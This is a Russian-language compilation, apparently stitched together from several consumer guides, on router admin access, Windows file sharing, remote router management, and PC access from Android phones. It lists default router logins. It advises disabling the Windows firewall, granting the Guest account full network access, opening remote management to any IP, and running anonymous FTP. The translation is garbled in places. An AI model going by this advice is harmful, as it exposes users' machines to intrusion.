Если доступно, вам будет предложено ввести имя пользователя и пароль.Если вы не знаете эту информацию, вероятно, для имени пользователя и пароля установлены значения по умолчанию, которые следует изменить. Информация по умолчанию для вашего маршрутизатора находится в документации маршрутизатора. Часто для имени пользователя и пароля используется либо «admin», либо «administrator», либо имя пользователя без пароля.

После ввода правильного имени пользователя и пароля вы получите полный доступ к маршрутизатору и сможете управлять его настройками.

Нет доступа

Если вы не можете получить доступ к маршрутизатору с помощью описанных выше шагов, попробуйте проверить связь с IP-адресом маршрутизатора, набрав: ping 192.168.1.1 (введите IP-адрес вашего маршрутизатора, если он отличается) в командной строке или консоли.

 пинг 192.168.1.1 
 PING 192.168.1.1 (192.168.1.1) 56 (84) байтов данных. 64 байта из 192.168.1.1: icmp_seq = 1 ttl = 64 time = 10,5 мс 64 байта из 192.168.1.1: icmp_seq = 2 ttl = 64 time = 0.954 мс 64 байта из 192.168.1.1: icmp_seq = 3 ttl = 64 time = 0.885 мс 64 байта из 192.168.1.1: icmp_seq = 4 ttl = 64 time = 0.982 мс 

Если вы не получаете ответа, проверьте свои сетевые подключения.

Если вы получаете ответ ping, но не можете получить доступ к маршрутизатору с помощью описанных выше шагов, доступ к настройкам вашего маршрутизатора будет другим. Кроме того, вы можете попробовать подключиться к маршрутизатору через Telnet.

.

Как получить доступ к другим компьютерам через WiFi | Малый бизнес

Большинство малых предприятий могут извлечь выгоду из наличия сети на рабочем месте. Когда компьютеры связаны друг с другом через Wi-Fi, они могут совместно использовать принтеры и файлы, а это означает, что один принтер будет обслуживать весь офис, и что время, потраченное на перемещение файлов на USB-накопители или отправку их по электронной почте, можно полностью сэкономить. Чтобы получить доступ к другим компьютерам через Wi-Fi, вам необходимо настроить рабочую группу с помощью Windows.

Щелкните в правом верхнем углу Windows и щелкните «Поиск», затем введите «Система» и щелкните «Параметры» и «Система».»Нажмите« Изменить настройки »в разделе« Имя компьютера, домен и настройки рабочей группы », затем выберите« Имя компьютера »и нажмите« Изменить ». В разделе «Член» выберите «Рабочая группа» и введите название сети своего офиса.

Щелкните еще раз в правом верхнем углу, а затем щелкните значок беспроводной сети, представленный серией полосок, показывающих мощность вашей сети. Щелкните правой кнопкой мыши активную сеть (все компьютеры в рабочей группе должны быть подключены к одной и той же сети Wi-Fi) и выберите «Включить или выключить совместное использование».»Щелкните« Да », чтобы включить общий доступ к файлам и принтерам.

Откройте проводник и выберите файл или папку, к которым вы хотите предоставить доступ другим компьютерам. Щелкните вкладку «Поделиться» и затем выберите, на каких компьютерах или в какой сети вы хотите поделиться этим файлом. Выберите «Рабочая группа», чтобы предоставить общий доступ к файлу или папке на всех компьютерах в сети.

Повторите шаги 1–3 на каждом компьютере, который вы хотите в сети - все компьютеры должны быть частью одной рабочей группы, чтобы иметь доступ друг к другу.Совместное использование файлов с каждого компьютера, чтобы предоставить другим компьютерам в сети доступ к файлам.

Щелкните в правом верхнем углу и щелкните «Поиск», затем введите «Принтеры», затем щелкните «Настройки» и «Принтеры» на компьютере в вашем офисе, к которому подключен принтер. Щелкните значок принтера, а затем перейдите на вкладку «Поделиться». Выберите «Поделиться с ...» и выберите «Рабочая группа», чтобы предоставить другим компьютерам в сети доступ к этому принтеру.

.

Как изменить настройки домашнего роутера?

Обновлено: 31.08.2020, Computer Hope

Все современные маршрутизаторы имеют интерфейс конфигурации (панель администрирования), доступ к которому можно получить в веб-браузере. Следуйте инструкциям на этой странице, чтобы получить доступ к домашнему маршрутизатору и настроить его.

Типичные причины изменения настроек маршрутизатора

Причины, по которым вам может потребоваться изменить конфигурацию домашнего маршрутизатора, включают:

  • Изменение имени (SSID) вашей беспроводной сети.
  • Изменение пароля (ключа шифрования) вашей беспроводной сети.
  • Изменение правил брандмауэра вашего маршрутизатора, чтобы разрешить входящий или исходящий трафик на определенных сетевых портах.
  • Изменение серверов доменных имен (DNS), используемых вашим маршрутизатором для разрешения сетевых адресов.
  • Изменение имени пользователя и пароля, используемых для доступа к интерфейсу администрирования вашего маршрутизатора.
  • Включение или отключение удаленного администрирования для вашего маршрутизатора, что позволяет администратору настраивать маршрутизатор с компьютера вне сети.
  • Настройка родительского контроля для ограничения доступа к определенным веб-сайтам из вашей сети.

Как настроить мою модель роутера?

Каждый маршрутизатор отличается . Даже маршрутизаторы одного производителя могут использовать разные инструменты настройки в зависимости от модели. Поэтому для настройки маршрутизатора важно обратиться к руководству , которое соответствует вашей конкретной модели маршрутизатора. Если вы не знаете, какая у вас модель маршрутизатора, проверьте корпус маршрутизатора на наличие идентифицирующей информации.

Если у вас больше нет печатного руководства, прилагаемого к маршрутизатору, вы можете найти документацию в Интернете на веб-сайте поддержки производителя. Вот несколько быстрых ссылок на сайты поддержки популярных маршрутизаторов:

Доступ к интерфейсу настройки маршрутизатора

Большинство современных маршрутизаторов имеют административную панель управления, доступ к которой можно получить через веб-браузер. Вы можете подключиться к нему в своем веб-браузере, как если бы это был веб-сайт. Страница передается в ваш браузер прямо с вашего роутера.

Чтобы подключиться к веб-интерфейсу маршрутизатора, выполните следующие действия:

  1. Подключитесь к локальной сети — Вам необходимо подключиться к локальной сети через маршрутизатор, чтобы получить доступ к веб-интерфейсу маршрутизатора. Это соединение может быть беспроводным или проводным (с помощью кабеля Ethernet, подключенного к одному из портов Ethernet вашего маршрутизатора). Подробные инструкции по созданию проводного подключения к маршрутизатору см. В нашем руководстве.
  2. Открыть новое окно браузера — Вы можете использовать любой интернет-браузер, например Firefox, Chrome, Edge или Safari.
  3. Перейдите к локальному адресу вашего маршрутизатора — В адресной строке введите IP-адрес вашего маршрутизатора. Это зависит от конфигурации вашего браузера, но обычно это одно из следующих:

192.168.0.1
192. 168.1.1
10.0.0.1
10.0.1.1

На изображении ниже адрес 192.168.0.1 вводится в адресную строку.

Если ни один из перечисленных выше IP-адресов вам не подходит, обратитесь к руководству.Некоторые маршрутизаторы могут зарезервировать специальный локальный адрес, который автоматически приведет вас к веб-интерфейсу вашего маршрутизатора. Например, ко многим маршрутизаторам Netgear можно получить доступ, перейдя по адресу routerlogin.net .

Вы также можете узнать адрес вашего маршрутизатора, спросив у сетевого оборудования вашего компьютера, что это такое. См. Определение адреса маршрутизатора ниже для получения дополнительной информации.

  1. Войдите в веб-интерфейс. — Если вы успешно перейдете к маршрутизатору, вы увидите приглашение входа, которое выглядит по-разному в зависимости от вашей модели маршрутизатора и используемого вами браузера.Это может выглядеть так же просто, как пример ниже.

В этом запросе введите имя пользователя и пароль администратора вашего маршрутизатора — обратите внимание, что это , а не , то же самое, что и пароль для подключения к вашей сети.

Если вы не знаете эту информацию, обратитесь к руководству вашего маршрутизатора. Его также можно распечатать на самом роутере. Некоторые производители маршрутизаторов создают уникальный логин для каждого маршрутизатора, а некоторые используют значение по умолчанию, которое одинаково для каждого устройства этой модели.

Если вы все еще застряли, вы всегда можете попробовать одну из традиционных комбинаций по умолчанию:

имя пользователя пароль
администратор пароль
администратор админ
администратор
администратор пароль
администратор
пользователь пароль
пользователь
  1. После ввода правильного имени пользователя и пароля вы можете получить доступ к веб-интерфейсу, который похож на следующий пример.

Отсюда у вас есть доступ ко всем настраиваемым параметрам вашего маршрутизатора.

Осторожно! Если вы измените что-то, чего не понимаете, вы можете случайно отключить или снизить производительность вашей сети. Если вы измените какие-либо настройки, запишите эти изменения на бумаге или в текстовом файле для дальнейшего использования.

Изменение имени и пароля маршрутизатора

Как только вы сможете получить доступ к своему маршрутизатору (см. Инструкции в предыдущем разделе), вы можете изменить имя (SSID) и пароль по умолчанию.Для этого следуйте приведенным ниже инструкциям. Однако имейте в виду, что каждый маршрутизатор немного отличается, поэтому шаги, используемые для поиска раздела пароля беспроводной сети вашего маршрутизатора, могут отличаться. Если вы не можете найти раздел безопасности беспроводной сети, обратитесь к руководству пользователя вашего маршрутизатора.

  1. Войдите в свой маршрутизатор (инструкции см. В предыдущем разделе).
  2. Найдите подраздел Setup или Wireless Setup , обычно в левой или верхней части окна.
  1. В меню Wireless Setup , введите предпочтительное имя маршрутизатора и пароль в разделах Name (SSID): и Passphrase: .
  1. Нажмите кнопку, чтобы сохранить новые настройки, а затем выйдите из экрана конфигурации маршрутизатора.

Сброс маршрутизатора до заводских настроек (при необходимости)

Если вы допустили ошибку при настройке маршрутизатора или не можете войти в систему, используя имя пользователя и пароль по умолчанию для маршрутизатора, вы можете сбросить настройки маршрутизатора до заводских настроек по умолчанию.На большинстве беспроводных маршрутизаторов кнопка, предназначенная для этой функции, расположена на задней панели устройства. Кнопка может быть помечена, а может и не быть. Он также может быть утопленным и для его прижатия потребуется скрепка. Подробности см. В руководстве.

Удерживание этой кнопки в течение определенного количества секунд вернет маршрутизатор к исходным настройкам. Обычно достаточно десяти секунд.

Помимо прочего, это приведет к сбросу имени беспроводной сети (SSID) и ключа (сетевого пароля) на значения по умолчанию.После сброса вам необходимо восстановить все подключения к беспроводной сети, используя эти значения по умолчанию.

Определение адреса роутера

Чтобы достоверно определить IP-адрес маршрутизатора, запросите у сетевого устройства его текущую конфигурацию. Это можно сделать разными способами в зависимости от вашей операционной системы:

Командная строка Windows

Как использовать командную строку Windows (DOS). окно. Вы можете сделать это, нажав Win + X (удерживая клавишу Windows и нажмите X), чтобы открыть меню «Опытные пользователи», затем выберите Командная строка .

В командной строке введите ipconfig и нажмите Enter, чтобы открыть команду ipconfig.

 ipconfig 

IP-адрес вашего маршрутизатора указан в выходных данных в качестве шлюза по умолчанию:

В этом примере адрес маршрутизатора — 192.168.1.1 .

Windows PowerShell

Начиная с 2017 г., Windows 10 использует PowerShell в качестве командной строки по умолчанию. Это улучшенная версия традиционной командной строки.

Чтобы запустить PowerShell, нажмите Win + R (удерживая клавишу Windows и нажмите R). В меню Выполнить введите powershell и нажмите Enter (или нажмите OK).

В командной строке PowerShell запустите ipconfig , чтобы открыть команду ipconfig.

 ipconfig 
 Ethernet-адаптер Ethernet: DNS-суффикс для конкретного соединения. : ваше-имя-маршрутизатора Локальный адрес IPv6. . . . . : fa88 :: 3203: 8d2e: f035: 757a% 4 IPv4-адрес.. . . . . . . . . . : 192.168.1.154 Маска подсети . . . . . . . . . . . : 255.255.255.0 Шлюз по умолчанию . . . . . . . . . :  192.168.1.1  Переходник туннельный 

[… выход для интерфейса …]

Совет

PowerShell позволяет изолировать текст в выводе. Отправив команду по конвейеру select-string , который похож на инструмент unix grep , вы можете отобразить только те строки, которые содержат строку «Gateway»:

 ipconfig | select-string --pattern "Шлюз" 
Оболочка Linux

В Linux используйте команду route с опцией -n .Команда должна запускаться от имени пользователя root.

В окне терминала запустите:

 sudo route -n 
 Таблица IP-маршрутизации ядра Шлюз назначения Genmask Fla 
.

Как сделать удаленный доступ к компьютеру через роутер?

Управление роутером через интернет — полезная функция, с помощью которой легко проверите использованный трафик, а также сможете изменить исходные данные и настройки, например, код доступа к Wi-Fi если есть подозрения о несанкционированном подключении. Рас

Управление роутером через интернет — полезная функция, с помощью которой легко проверите использованный трафик, а также сможете изменить исходные данные и настройки, например, код доступа к Wi-Fi если есть подозрения о несанкционированном подключении. Расскажем детально и наглядно, как можно реализовать эту задумку.

Подумывали о том, как реализовать возможность дистанционного управления маршрутизатором через всемирную сеть? Если отложили этот замысел из-за сложной реализации, тогда предлагаем простую инструкцию, с помощью которой легко решите задачу.

Чтобы создать удаленный доступ к компьютеру через роутер используйте любой удобный браузер. Открыв его, выполните такие действия:

  1. В адресной строке задайте IP маршрутизатора. Стандартный IP — 192.168.1.1.
  2. В открывшемся окне входа введите имя (admin) и пароль (admin).
  3. Из списка слева в открывшемся окошке выберите Security➔ Remote Management.
  4. В окошке Remote Management укажите в адресной строке конкретный IP (это означает, что только с этого компьютера сможете дистанционно подключатся к роутеру) или числовой стандарт — 255.255.255.255 (удаленное подключение может производится с любого IP). Если оставите нули, тогда этим запрещаете любое удаленное подключение к устройству.

Эти сведения следует сохранить, нажав кнопку Save.

Этот простой алгоритм максимально упростит выполнение задачи по отладке дистанционного управления маршрутизатором.

Как открыть доступ к компьютеру из сети

В этой статье я расскажу, как можно получить доступ к компьютеру из сети. Открыть доступ к компьютеру по сети для обмена с ним информацией.
Например, вам нужно дать общий доступ на папку. Допустим, вы это сделали, пытаетесь зайти в эту папку с другого компьютера, а вам выдает окошко, где просит ввести «логин» и «пароль», или выдает ошибку, что у вас недостаточно прав, с просьбой обратиться к системному администратору.
Имеется два компьютера соединенные между собой, и у вас  возникла потребность, обмениваться файлами между собой.
Имеется:

  • Первый компьютер: у него ip адрес 192.168.0.2
  • Второй компьютер: у него ip адрес 192.168.0.3

Создаем общую папку на первом компьютере

Щелкаем правой кнопкой мыши по рабочему столу, выпадает контекстное меню => создать => папку. На рабочем столе появится «Новая папка», переименуем её в «общий доступ». Нажимаем на неё правой кнопкой мыши, появится контекстное меню => свойство. Переключаемся на вкладку «Доступ».

Нажимаем на кнопку «Общий доступ», появляется окно, следующего вида:

В строке, где у меня написано «Все», вы тоже пишете это слово, дальше нажимаете на кнопку «Добавить». После чего ниже у вас появится надпись «Все», напротив неё будет стоять значение «Чтение», нажимаем на это слово «Чтение» и выбираем «Чтение и запись», после чего нажимаем на кнопку «Общий Доступ» – «Готово».
Дальше надо нажать на кнопку «Расширенные настройки», у вас откроется следующее окно:

В этом окне, нужно поставить галочку «Открыть общий доступ к этой папке» и нажать на кнопку «Разрешения», после чего появится новое окно:

В колонке «Разрешить» нужно поставить все галочки, и нажать на кнопки «Ок», «Ок», «Закрыть». На этом добавление общего доступа для папки окончено.

Отключаем Брандмауэр Windows

Заходим в панель управления => администрирование  => Брандмауэр Windows в режиме повышенной безопасности.

Нажимаем на кнопку «Действия» => «Свойства», появится окно следующего вида:

На вкладке «Профиль домена» есть пункт «Брандмауэр», по умолчанию там стоит «Включить (рекомендуется)», вы ставите «Отключить» и нажимаете «Ок». На этом отключение Брандмауэра Windows завершено.

Локальная политика безопасности

Настраиваем «Локальную политику безопасности». Заходим в панель управления => администрирование  => локальная политика безопасности. У вас на экране появится следующее окно:

В этом окне слева есть пункты безопасности «Локальные политики» => «Назначение прав пользователя». С правой стороны откроется список политик, в этом пункте нас интересует два пункта, на скриншоте они выделены красным «Доступ к компьютеру из сети» и «Отказать в доступе к этому компьютеру из сети».

Доступ к компьютеру из сети

Нажимаем два раза на эту строчку, у вас откроется окно следующего вида:

В это окно нужно добавить учетную запись «Гость», для этого нажимаем на кнопку «Добавить пользователя или группу…», у вас появится новое окно:

В котором вы нажимаете на кнопку «Дополнительно» и переходим в следующее окно:

В этом окне вы нажимаете «поиск», после чего появится «результат поиска: в котором вы должны найти учетную запись «Гость», затем нажимаем на кнопку «Ок», «Ок», «Ок».

Отказать в доступе к этому компьютеру из сети

Нажимаем два раза по этой строчке и у вас откроется следующее окно:

В этом окне вам нужно выделить учетную запись «Гость», нажать на кнопку «Удалить», и нажать кнопку «Ок». На этом процесс настройки локальных политик окончен.

Проверим работоспособность данного метода

Заходим с другого компьютера, в «мой компьютер», слева будет колонка внизу, в которой будет пункт – «Сеть», при нажатии у вас откроется окошко слева, где будут указаны компьютеры вашей рабочей группы. Нажимаете на первый компьютер, на котором мы создали папку «общий доступ» и у вас должно открыться окно, в котором будет эта папка. Просто перетащите в эту папку файл, и он окажется на первом компьютере.
Надеюсь, данная статья была полезна для вас.

Настройка локальной сети компьютер-компьютер

Предыдущая

LanNetwork Assistant — чат для вашей сети

Следующая

WindowsНебольшой обзор по работе с электронной почтой

Удаленный доступ к компьютеру с мобильных устройств

При наличии дома беспроводного маршрутизатора Андроид-смартфон и ПК под управлением Windows могут составить удачный тандем. Ведь копировать объемные мультимедийные файлы с компьютера на мобильное устройство по Wi-Fi гораздо удобней, чем каждый раз подключать гаджет к USB-порту. Кроме того, смартфон можно превратить в пульт дистанционного управления и терминал удаленного доступа, а ПК будет исполнять роль сетевого хранилища и медиасервера.

Все это стало возможным благодаря открытости мобильной платформы Андроид и широчайшим возможностям ОС Windows, а также обилию приложений — как платных, так и бесплатных — для них обеих. В результате операционные системы от компаний Google и Microsoft, несмотря на изначальные различия (Андроид основана на ядре Linux), оказались вполне совместимыми и за последние несколько лет неплохо «сдружились». В любом случае, у них сейчас гораздо больше общего друг с другом, чем с мобильной платформой Apple iOS с ее закрытой архитектурой и запретами на многие, казалось бы, обязательные функции.

В онлайн-магазине Google Play Market представлено большое количество приложений для того, чтобы настроить удаленный доступ к компьютеру со смартфона или планшета, но найти среди них по-настоящему стоящие внимания решения отнюдь не просто. Поэтому мы подберем для вас самые удобные и в то же время абсолютно бесплатные программы для взаимодействия Андроид-устройств с Windows-компьютерами, а также подробно расскажем, как подготовить их к работе.

Удаленный доступ к компьютеру: общая папка Windows

Для того чтобы подключаться к открытой для общего доступа папке на компьютере, учетная запись администратора не подойдет — необходимо создать дополнительную учетную запись Windows. Кроме того, это требуется сделать и в целях безопасности. Для этого перейдите в меню «Пуск | Панель управления | Учетные записи пользователей | Управление другой учетной записью | Создание учетной записи». Затем укажите имя нового профиля пользователя Windows, а также выберите тип «Обычный доступ».

После настройки ПК под управлением Windows установите на Андроид-устройство файловый менеджер «ES Проводник». Помимо работы с локальными файлами он умеет подключаться к FTP-серверам. В большинстве случаев для работы с этим протоколом удобнее использовать специальный AndFTP, о котором далее пойдет речь. Но в данной ситуации нас интересует именно возможность подключения к общим папкам Windows.

Первым делом необходимо подготовить ПК, настроив папки для совместного использования. Кроме того, в Windows необходимо завести новую учетную запись пользователя, о чем мы рассказали выше. Файлы для обмена с планшетом или смартфоном удобно складывать в отдельный каталог, который надо сделать видимым по Сети. Как это реализовать, описано ниже.

После добавления адреса сервера, в качестве которого выступает ваш настольный компьютер, а также данных учетной записи пользователя Windows в главном меню «ES Проводник» появится значок для быстрого подключения к ПК. Стоит на него нажать, как на экране появятся файлы удаленного компьютера.

Передача данных по Wi-Fi: инструкция

1. ЧТОБЫ ОТКРЫТЬ ОБЩИЙ ДОСТУП К ПАПКЕ НА ПК, щелкните по ней правой кнопкой мыши и выберите пункт контекстного меню «Свойства». В появившемся окне перейдите на вкладку «Доступ» и нажмите на «Расширенную настройку». Установите флажок «Открыть общий доступ к этой папке» и кликните по кнопке «Разрешения».

2. НАЖМИТЕ НА КНОПКУ «ДОБАВИТЬ», в появившейся строке введите имя ранее созданной учетной записи Windows и щелкните по «ОК», чтобы предоставить данному профилю пользователя доступ к папке или целому локальному диску.

3. ЧТОБЫ ПОЛУЧИТЬ ВОЗМОЖНОСТЬ не только скачивать файлы с ПК на Андроид-устройство, но и загружать их в обратном направлении, выделите мышью имя ранее созданной учетной записи, а затем установите флажок в первой колонке напротив пункта «Полный доступ».

4. В ПРОГРАММЕ «ES ПРОВОДНИК» проведите пальцем по экрану справа налево, чтобы перейти на вкладку «Локальная сеть». На панели инструментов нажмите на «Создать | Сервер». В строке «Адрес» введите IP-адрес ПК (например, «192.168.0.100»), а в строках «Логин» и «Пароль» — соответствующие данные созданной ранее учетной записи Windows.

Удаленный доступ к компьютеру: передача файлов по FTP

Самый классический способ предоставления доступа к данным появился еще в 1971 году, но до сих пор не утратил актуальность. Серверы на основе протокола FTP легки в настройке и совместимы с любыми устройствами.

Данный протокол имеет ряд недостатков. Так, максимальный объем передаваемого файла не должен превышать 2 Гбайт, а кириллические имена могут отображаться некорректно. Зато легко получить доступ к FTP-серверу можно будет даже находясь за пределами домашней компьютерной сети. Однако для этого нужно предварительно настроить соответствие портов и узнать внешний IP-адрес беспроводного маршрутизатора, присвоенный Интернет-провайдером, либо воспользоваться веб-сервисом No-IP (no-ip.com).

Налаживание взаимодействия Андроид-девайса и ПК советуем начать именно с настольного устройства. Запустите не требующее установки приложение Baby FTP Server, настроить которое, как и следует из названия, по силам даже младенцу. Интерфейс программы и правда незамысловат, а выбор настроек минимальный — даже пароль установить не получится. Поэтому, если вы планируете доступ к вашему серверу не только из домашней сети, но и извне, то в целях безопасности стоит предоставлять права только на чтение. Выберите в главном меню Baby FTP Server пункт «Settings» и укажите папку, к которой будет открыт доступ по протоколу FTP. Затем установите флажки напротив пунктов «Allow Download» (это позволит скачивать файлы с ПК на смартфон) и «Allow Upload» (это необходимо для загрузки данных в обратном направлении). По желанию дайте разрешение на удаленное создание папок, а также переименование и стирание файлов.

Чтобы проверить, нормально ли функционирует ваш только что настроенный FTP-сервер, введите в адресной строке любого браузера ftp://192.168.0.100 (IP-адрес компьютера может отличаться). Если все настройки были произведены верно, на веб-странице вы должны увидеть список файлов, которые содержатся в выделенной под нужды FTP-сервера папке.

После того как FTP-сервер для ОС Windows установлен и настроен, можно приступать к подготовке смартфона или планшета. Пожалуй, лучшим бесплатным FTP-клиентом для мобильной платформы Андроид на сегодняшний день является приложение AndFTP. Помимо продуманного интерфейса, а также высокой скорости и, что не менее важно, стабильности соединения, данный пакет может похвастаться еще и интеграцией с системным меню передачи файлов на смартфоне. Теперь кнопка для быстрой передачи файлов с мобильного гаджета на ПК по протоколу FTP будет находиться рядом со значками Gmail, Bluetooth, «облачных» хранилищ и социальных сетей.

Передача файлов по FTP:инструкция

1. ОБЯЗАТЕЛЬНО АКТИВИРУЙТЕ в настройках Baby FTP Server пункт «Automatically activate server on startup», чтобы приложение запускалось при каждой загрузке ОС Windows.

2. ОБРАЩАТЬСЯ К FTP-СЕРВЕРУ можно не только из специализированной программы, но и из браузера. Правда, в последнем случае кириллические имена файлов иногда отображаются некорректно.

3. НАЖМИТЕ НА КНОПКУ «ДОБАВИТЬ», чтобы создать в программе AndFTP новое подключение. В соответствующих строках укажите IP-адрес сервера (например «192.168.0.100»), порт «21» и имя пользователя «Anonymous». Строку «Пароль» оставьте незаполненной. Установите флажок напротив пункта «Разрешить поддержку докачки», чтобы иметь возможность продолжить загрузку файлов после аварийного обрыва связи. Напоследок нажмите «Сохранить», чтобы изменения вступили в силу.

4. ВЫДЕЛИТЕ В ПРОГРАММЕ ANDFTP НЕСКОЛЬКО ФАЙЛОВ на ПК, удерживая на них палец около секунды, а затем нажмите на кнопку «Скачать», чтобы скопировать в память смартфона. Если же появится необходимость передать файлы в обратном направлении, нажмите на «Локальные файлы» и повторите вышеописанную процедуру.

Удаленный рабочий стол

Беспроводная передача файлов между ПК и Андроид-устройством — это, конечно, хорошо, но время от времени возникает необходимость получить доступ к Рабочему столу Windows. Сделать это можно с помощью Андроид-приложения под названием PocketCloud Remote Desktop.

Чтобы разрешить удаленное подключение к ПК, его нужно предварительно настроить. Для этого нажмите «Пуск | Панель управления | Система | Настройка удаленного доступа», а затем установите флажок «Разрешать подключения от компьютеров с любой версией удаленного рабочего стола (опаснее)». К слову, для подключения будет использоваться рассмотренная выше дополнительная учетная запись Windows (см. раздел «Общая папка Windows»).

В целом, приложение PocketCloud Remote Desktop не вызывает нареканий: экранная клавиатура и эмуляция мыши функционируют корректно, и, как результат, работать с Windows-программами почти так же удобно, как на ПК.

При подключении к удаленному Рабочему столу Windows посредством приложения PocketCloud Remote Desktop не переусердствуйте с разрешением экрана и цветовой гаммой TeamViewer — управление ПК через Интернет

Рассмотренный выше протокол RDP, бесспорно, удобен и не требует установки на ПК дополнительного приложения-сервера. Но, если возникнет необходимость подключиться к удаленному Рабочему столу через Интернет, придется произвести ряд сетевых настроек. Избежать лишних действий поможет хорошо знакомое пользователям Windows приложение TeamViewer, специальная версия которого существует и для мобильной платформы Андроид.

Подключение к удаленному Рабочему столу в TeamViewer происходит на основе логина и пароля, которые автоматически генерируются сервером программы, что весьма удобно. Еще одним преимуществом TeamViewer является автоматическая подстройка качества транслируемого изображения в зависимости от скорости соединения.

Помимо прочего, смартфон под управлением Андроид хорошо подходит на роль пульта дистанционного управления медиапроигрывателями Windows. В каталоге Google Play Market можно найти соответствующие программы практически для всех популярных аудио- и видеоплееров. Так, переключиться на следующую музыкальную композицию либо немного прибавить громкости в стандартном проигрывателе Microsoft — Windows Media Player — можно с помощью приложения WMP Remote LITE.

Для дистанционного управления популярным аудиоплеером AIMP подойдет программа Aimp Control. Аналогичные приложения существуют и для видеопроигрывателей Media Player Classic и VideoLAN — соответственно, Remote MPC и Remote for VLC.

«Подружить» с Андроид-смартфоном можно даже, казалось бы, «вражеский» iTunes — для управления медиа- плеером от Apple создана программа iRemote FREE ?Torrent Remote

Клиент удаленного доступа ?Torrent Remote позволяет не только узнать процент завершенности загрузок, но и приостановить или, наоборот, запустить отдельные из них. Чтобы воспользоваться приложением ?Torrent Remote для Андроид-устройств, необходимо предварительно указать логин и пароль доступа в настройках программы ?Torrent для Windows. Для этого в главном меню выберите пункт «Настройки | Настройки программы | Удаленный доступ» и установите флажок напротив пункта «Доступ к удаленному ?Torrent».

В результате у вас появится возможность управлять процессом загрузки файлов посредством протокола BitTorrent с помощью смартфона или планшета, как в рамках локальной сети, так и по Интернету.

Инструмент Syncthing

Доступ к данным ПК на базе Windows возможен со смартфона или планшета на Android — например, с использованием файлового менеджера Ghost Commander и плагина Samba. Но во время нашего тестирования он не всегда благополучно работал, к тому же управление не очень удобное.

Проще использовать синхронизацию смартфона с ПК, чтобы, например, фотографии, снятые на смартфон, автоматически копировались на компьютер и наоборот: чтобы аудиозаписи подгружались на смартфон с ПК, при условии, что оба будут включены и подключены к одной и той же беспроводной сети.

Инструмент Syncthing с открытым исходным кодом справляется с этим довольно легко: его собственный Block Exchange Protocol позволяет подключать друг к другу несколько устройств независимо от сети Windows и использует передачу TCP.

1. УСТАНОВИТЕ НА ВАШЕ МОБИЛЬНОЕ УСТРОЙСТВО ANDROID ПРИЛОЖЕНИЕ SYNCTING из магазина Play Market, а на ПК — утилиту SyncTrayzor. Запустите SyncTrayzor на компьютере и откройте меню «Действия | Показать ID».

2. В ПРИЛОЖЕНИИ ANDROID ПЕРЕЙДИТЕ НА ВКЛАДКУ «УСТРОЙСТВА», затем коснитесь значка «+» в правом верхнем углу и затем значка QR-кода справа в поле «ID устройства». Отсканируйте отображенный программой на ПК QR-код и введите название ПК в поле «Имя».

3. ЧЕРЕЗ НЕКОТОРОЕ ВРЕМЯ (МЕНЬШЕ МИНУТЫ) SНТСTRAZOR НА ПК ЗАПРОСИТ РАЗРЕШЕНИЕ НА ПОДКЛЮЧЕНИЕ УСТРОЙСТВА, КОТОРОЕ НУЖНО ПОДТВЕРДИТЬ. В следующем диалоговом окне установите флажок «Auto Accept» и нажмите «Сохранить».

4. ТЕПЕРЬ В ПРИЛОЖЕНИИ НА ВКЛАДКЕ «ПАПКИ» ДОБАВЬТЕ ПАПКИ, которые нужно синхронизировать с ПК. Помимо изображений рекомендуется синхронизировать директории, в которых важные приложения сохраняют резервные копии.

5. ЧТОБЫ СИНХРОНИЗИРОВАТЬ МУЗЫКУ, хранящуюся на компьютере, со смартфоном, в SyncTrayzor нажмите «Добавить папку», задайте описательное название в поле «Ярлык папки», в поле «Путь к папке» укажите папку с музыкальной коллекцией на ПК и далее в поле «Предоставить доступ к устройствам» выберите ваш смартфон.

6. НА СМАРТФОНЕ ПОЯВИТСЯ УВЕДОМЛЕНИЕ Android (снова с некоторой задержкой), что компьютер хочет поделиться папкой, которое нужно подтвердить и затем выбрать или создать на смартфоне целевую папку.

Читайте также:

Удаленный рабочий стол: разрешение доступа к компьютеру извне сети

  • Статья
  • Чтение занимает 2 мин
Были ли сведения на этой странице полезными?

Оцените свои впечатления

Да Нет

Хотите оставить дополнительный отзыв?

Отзывы будут отправляться в корпорацию Майкрософт. Нажав кнопку «Отправить», вы разрешаете использовать свой отзыв для улучшения продуктов и служб Майкрософт. Политика конфиденциальности.

Отправить

В этой статье

Область применения: Windows Server 2022, Windows Server 2019, Windows 10, Windows Server 2016

При подключении к своему компьютеру с помощью клиента удаленного рабочего стола вы создаете одноранговое подключение. Это означает, что требуется прямой доступ к компьютеру (иногда его называют «узлом»). Если вам нужно подключить к компьютеру извне сети, в которой он работает, необходимо разрешить этот доступ. Доступно несколько вариантов: использовать перенаправление портов или настроить виртуальную частную сеть (VPN).

Включение перенаправления портов на маршрутизаторе

Перенаправление портов просто сопоставляет порт для IP-адреса маршрутизатора (вашего общедоступного IP-адреса) с портом и IP-адресом компьютера, к которому необходимо получить доступ.

Конкретная последовательность действий для включения перенаправления портов зависит от маршрутизатора, который вы используете, поэтому необходимо найти в Интернете инструкции для своего маршрутизатора. Общие сведения об этих действиях см. на странице wikiHow How to Set Up Port Forwarding on a Router (Как настроить перенаправление портов на маршрутизаторе).

Прежде чем сопоставить порт, потребуется следующее.

  • Найдите его, выбрав Параметры Сеть и Интернет > Состояние > Просмотр свойств сети. Найдите конфигурацию сети с состоянием «Работает» и получите IPv4-адрес.

  • Общедоступный IP-адрес (IP-адрес маршрутизатора). Существует много способов узнать его. Можно выполнить поиск «my IP» (в Bing или Google) или просмотреть свойства сети Wi-Fi (для Windows 10).

  • Номер сопоставляемого порта. В большинстве случаев это 3389 — порт по умолчанию, используемый подключениями к удаленному рабочему столу.

  • Административный доступ к маршрутизатору.

    Предупреждение

    Вы открываете доступ к компьютеру из Интернета, что не рекомендуется. Если это необходимо, обязательно задайте для своего ПК надежный пароль. Предпочтительнее использовать VPN.

После сопоставления порта вы сможете подключаться к компьютеру узла извне локальной сети, подключаясь к общедоступному IP-адресу маршрутизатора (см. второй пункт выше).

Вы можете изменить IP-адрес маршрутизатора. Ваш поставщик услуг Интернета (ISP) может назначить новый IP-адрес в любое время. Чтобы избежать этой проблемы, рассмотрите возможность использования динамических DNS-имен. Это позволит подключаться к компьютеру с помощью легко запоминающегося доменного имени, а не IP-адреса. Маршрутизатор автоматически обновит службу DDNS, если IP-адрес изменится.

